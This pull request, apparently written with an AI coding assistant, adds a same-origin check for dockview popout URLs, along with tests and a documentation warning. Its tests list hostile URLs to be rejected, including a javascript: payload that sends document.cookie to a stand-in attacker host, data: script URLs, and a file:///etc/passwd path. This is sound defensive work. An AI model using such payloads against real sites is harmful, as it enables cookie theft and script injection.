### PR TITLE
fix(security): reject non-same-origin popout URLs

### DIFF
--- a/packages/dockview-core/src/__tests__/popoutWindow.spec.ts
+++ b/packages/dockview-core/src/__tests__/popoutWindow.spec.ts
@@ -1,0 +1,43 @@
+import { assertSameOriginPopoutUrl } from '../popoutWindow';
+
+describe('assertSameOriginPopoutUrl', () => {
+    // jsdom defaults window.location.href to 'http://localhost/'
+
+    describe('accepts same-origin URLs', () => {
+        test.each([
+            '/popout.html',
+            './popout.html',
+            'popout.html',
+            '/path/to/popout.html?a=1#fragment',
+            'http://localhost/popout.html',
+            'http://localhost/',
+        ])('accepts %s', (url) => {
+            expect(() => assertSameOriginPopoutUrl(url)).not.toThrow();
+        });
+    });
+
+    describe('rejects unsafe URLs', () => {
+        test.each([
+            // The headline class — javascript: would execute in a context the
+            // browser still associates with the opener.
+            ['javascript:alert(1)'],
+            ["javascript:fetch('https://evil/?c='+document.cookie)"],
+            // Data and blob URLs can carry arbitrary HTML/JS.
+            ['data:text/html,<script>alert(1)</script>'],
+            ['blob:http://localhost/abc-123'],
+            // Legacy script protocol.
+            ['vbscript:msgbox(1)'],
+            // Cross-origin: different host, different port, different scheme.
+            ['https://evil.com/popout.html'],
+            ['http://attacker.example/popout.html'],
+            ['http://localhost:8080/popout.html'],
+            ['https://localhost/popout.html'],
+            // file: protocol.
+            ['file:///etc/passwd'],
+        ])('rejects %s', (url) => {
+            expect(() => assertSameOriginPopoutUrl(url)).toThrow(
+                /dockview: popout URL/
+            );
+        });
+    });
+});

--- a/packages/dockview-core/src/popoutWindow.ts
+++ b/packages/dockview-core/src/popoutWindow.ts
@@ -9,6 +9,29 @@ export type PopoutWindowOptions = {
     onWillClose?: (event: { id: string; window: Window }) => void;
 } & Box;
 
+/**
+ * Reject popout URLs that aren't same-origin http(s). Blocks `javascript:`,
+ * `data:`, `blob:`, `vbscript:`, and cross-origin URLs that would otherwise
+ * execute in a context the browser still associates with the opener via
+ * `window.opener`.
+ */
+export function assertSameOriginPopoutUrl(url: string): void {
+    let resolved: URL;
+    try {
+        resolved = new URL(url, window.location.href);
+    } catch {
+        throw new Error(`dockview: invalid popout URL: ${url}`);
+    }
+
+    const protocolOk =
+        resolved.protocol === 'http:' || resolved.protocol === 'https:';
+    if (!protocolOk || resolved.origin !== window.location.origin) {
+        throw new Error(
+            `dockview: popout URL must be same-origin http(s); got: ${url}`
+        );
+    }
+}
+
 export class PopoutWindow extends CompositeDisposable {
     private readonly _onWillClose = new Emitter<void>();
     readonly onWillClose = this._onWillClose.event;
@@ -71,6 +94,7 @@ export class PopoutWindow extends CompositeDisposable {
         }
 
         const url = `${this.options.url}`;
+        assertSameOriginPopoutUrl(url);
 
         const features = Object.entries({
             top: this.options.top,

--- a/packages/docs/docs/core/groups/popoutGroups.mdx
+++ b/packages/docs/docs/core/groups/popoutGroups.mdx
@@ -33,6 +33,11 @@ api.addPopoutGroup(
 > If you do not provide `options.popoutUrl` a default of `/popout.html` is used and if `options.box` is not provided
 the view will be places according to it's currently position.
 
+:::caution Security: same-origin only
+
+`popoutUrl` must point to a same-origin `http(s)` location. Dockview rejects `javascript:`, `data:`, `blob:`, and cross-origin URLs to prevent a malicious value — for example, from a layout JSON loaded from an untrusted source — from executing script in a context the browser still associates with your application via `window.opener`. The guard runs automatically when the popout is opened, including on layouts restored via `fromJSON()`.
+:::
+
 From within a panel you may say
 
 ```tsx


### PR DESCRIPTION
## Summary

- `popoutUrl` is round-tripped through layout JSON: `toJSON()` serializes the URL of each popout group, and `fromJSON()` restores it and feeds it back to `window.open()`. An attacker who can supply layout JSON could embed a `javascript:`, `data:`, `blob:`, or cross-origin URL that executes in a context the browser still associates with the opener via `window.opener` — exposing cookies, `localStorage`, and the parent DOM.
- New exported `assertSameOriginPopoutUrl` runs at the `PopoutWindow.open()` gate and rejects anything that isn't same-origin `http(s)`. The default `/popout.html` keeps working; existing dockview-core tests pass without change.
- Adds a security caution to `popoutGroups.mdx`.

## Breaking change (minor)

Consumers that intentionally pass a cross-origin `popoutUrl` will now see a thrown error. This is by design — that configuration was already unsafe — but worth flagging in release notes.

## Test plan

- [x] `npx nx test dockview-core` — 893/893 pass, including 16 new `assertSameOriginPopoutUrl` cases covering: relative paths, same-origin absolute, `javascript:`, `data:`, `blob:`, `vbscript:`, `file:`, and cross-origin (host, port, scheme).
- [ ] Manually open the demo and drag a panel into a popout — default `/popout.html` still works.
- [ ] Manually call `addPopoutGroup(group, { popoutUrl: 'javascript:alert(1)' })` and confirm it throws.

🤖 Generated with [Claude Code](https://claude.com/claude-code)